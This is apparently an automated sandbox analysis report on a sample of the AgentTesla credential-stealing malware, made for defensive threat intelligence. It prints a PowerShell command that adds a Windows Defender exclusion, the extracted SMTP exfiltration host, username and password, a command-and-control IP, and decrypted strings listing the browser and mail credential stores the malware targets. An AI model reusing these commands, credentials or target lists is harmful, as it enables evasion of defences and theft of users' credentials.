Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER#023_2024.exe

Overview

General Information

Sample name:ORDER#023_2024.exe
Analysis ID:1568740
MD5:cb93d77357df18ffb788e73e7f9e8ba1
SHA1:0fa0e09a4905239dca028b58a0e6523e8c91498c
SHA256:3591cadebdbbaee9e75158d085435cf81ba8cdfc5c92b050275f9b490ee60998
Tags:AgentTeslaexeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ORDER#023_2024.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: CB93D77357DF18FFB788E73E7F9E8BA1)
    • powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6016 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • ORDER#023_2024.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: CB93D77357DF18FFB788E73E7F9E8BA1)
    • ORDER#023_2024.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: CB93D77357DF18FFB788E73E7F9E8BA1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.ORDER#023_2024.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.ORDER#023_2024.exe.3c384f0.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.ORDER#023_2024.exe.3c61510.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.ORDER#023_2024.exe.3c61510.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.ORDER#023_2024.exe.3c384f0.0.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER#023_2024.exe", ParentImage: C:\Users\user\Desktop\ORDER#023_2024.exe, ParentProcessId: 6936, ParentProcessName: ORDER#023_2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", ProcessId: 3180, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER#023_2024.exe", ParentImage: C:\Users\user\Desktop\ORDER#023_2024.exe, ParentProcessId: 6936, ParentProcessName: ORDER#023_2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", ProcessId: 3180, ProcessName: powershell.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\ORDER#023_2024.exe, Initiated: true, ProcessId: 4268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER#023_2024.exe", ParentImage: C:\Users\user\Desktop\ORDER#023_2024.exe, ParentProcessId: 6936, ParentProcessName: ORDER#023_2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", ProcessId: 3180, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T22:03:40.849487+010020301711A Network Trojan was detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T22:02:06.918218+010028555421A Network Trojan was detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T22:02:06.918218+010028552451A Network Trojan was detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T22:03:40.849487+010028397231Malware Command and Control Activity Detected192.168.2.449734199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T22:03:40.849487+010028400321A Network Trojan was detected192.168.2.449734199.79.62.115587TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Multi AV Scanner detection for submitted file
                        Source: ORDER#023_2024.exeReversingLabs: Detection: 65%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: ORDER#023_2024.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: /log.tmp
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>[
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ]<br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Time:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>User Name:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>Computer Name:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>OSFullName:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>CPU:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>RAM:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IP Address:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: New
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IP Address:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: *o9H+18Q4%;M
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: KTvkzEc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: KTvkzEc.exe
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: KTvkzEc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Type
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <b>[
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ]</b> (
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: )<br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {BACK}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ALT+TAB}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ALT+F4}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {TAB}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ESC}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {Win}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {CAPSLOCK}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYUP}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYDOWN}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYLEFT}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYRIGHT}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {DEL}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {END}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {HOME}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {Insert}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {NumLock}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {PageDown}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {PageUp}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ENTER}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F1}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F2}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F3}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F4}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F5}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F6}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F7}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F8}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F9}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F10}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F11}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F12}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: control
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {CTRL}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &amp;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &lt;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &gt;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &quot;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: logins
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IE/Edge
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Secure Note
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Web Password Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Credential Picker Protector
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Web Credentials
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Credentials
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Domain Password Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Extended Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SchemaId
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pResourceElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pIdentityElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pPackageSid
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IE/Edge
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UC Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UCBrowser\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Login Data
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: journal
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: wow_logins
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Safari for Windows
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <array>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <dict>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <data>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </data>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: -convert xml1 -s -o "
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \fixed_keychain.xml"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Protect\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: QQ Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Default\EncryptedStorage
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Profile
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \EncryptedStorage
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: entries
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: category
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: str3
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: str2
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: blob0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: password_value
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IncrediMail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PopPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmtpPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Accounts_New
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PopPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmtpPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmtpServer
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: EmailAddress
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Eudora
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: current
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Settings
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SavePasswordText
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Settings
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ReturnAddress
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Falkon Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \falkon\profiles\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: profiles.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: profiles.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \browsedata.db
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: autofill
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ClawsMail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Claws-mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \clawsrc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \clawsrc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passkey0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \accountrc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: smtp_server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: address
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: account
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \passwordstorerc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Flock Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Flock\Browser\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: signons3.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: DynDns
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ALLUSERSPROFILE
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: username=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: password=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: https://account.dyn.com/
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: t6KzXhCh
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ALLUSERSPROFILE
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: global
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: accounts
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: account.
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: username
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: account.
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Psi/Psi+
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: name
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Psi/Psi+
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
